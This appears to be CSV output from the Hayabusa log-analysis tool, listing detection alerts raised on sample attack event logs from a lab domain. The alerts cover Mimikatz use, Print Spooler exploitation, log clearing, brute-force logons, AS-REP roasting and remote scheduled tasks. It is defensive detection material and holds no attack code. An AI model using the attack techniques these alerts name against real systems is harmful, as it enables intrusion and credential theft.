Usage,,rules/sigma/process_creation/process_creation_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx -2021-05-15 05:39:33.214 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx -2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx -2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx -2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx -2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx -2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx -2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx -2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx -2021-05-20 21:49:31.863 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:46.875 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: sshd_5848 : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_5848 : Workstation: - : IP Address: - : Port: - : LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: sshd_5848 : LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:52.315 +09:00,-,-,medium,User Guessing Attempt,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_UserGuessingDetect.yml,- -2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: sshd_4332 : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_4332 : Workstation: - : IP Address: - : Port: - : LogonID: 0x47a203c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:18.227 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: admmig : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:22.562 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:22.562 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,- -2021-05-22 05:43:49.345 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:50.131 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:50.607 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:50.866 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-23 06:56:57.685 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx -2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx -2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx -2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47156 : LogonID: 0x312517c1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47160 : LogonID: 0x31251a6a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:34.373 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65333 : LogonID: 0x31251ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:34.375 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65335 : LogonID: 0x31251d11,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65336 : LogonID: 0x31251d23,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:34.380 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65337 : LogonID: 0x31251d36,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx -2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,informational,Kerberos TGT was requested,User: admin-test : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0 : PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx -2021-06-01 23:06:34.542 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: WADGUtilityAccount : SID:S-1-5-21-1081258321-37805170-3511562335-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" -2021-06-01 23:08:21.225 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: elie : SID:S-1-5-21-1081258321-37805170-3511562335-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" -2021-06-03 21:17:56.988 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx -2021-06-03 21:18:12.941 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx -2021-06-03 21:18:12.942 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 56061 : LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx -2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,high,Windows Firewall Profile Disabled,,rules/sigma/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx -2021-06-04 04:17:44.873 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx -2021-06-04 04:39:52.893 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx -2021-06-04 04:39:52.895 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx -2021-06-04 04:39:53.056 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx -2021-06-04 17:41:47.982 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx -2021-06-04 17:41:48.041 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx -2021-06-11 06:21:20.636 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 51503 : LogonID: 0x5a4175e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" -2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 56594 : LogonID: 0x5a41984,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" -2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx -2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" -2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx -2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" -2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx -2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" -2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx -2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" -2021-06-13 15:17:18.087 +09:00,sv-dc.hinokabegakure-no-sato.local,59,informational,Bits Job Creation,Job Title: test : URL: 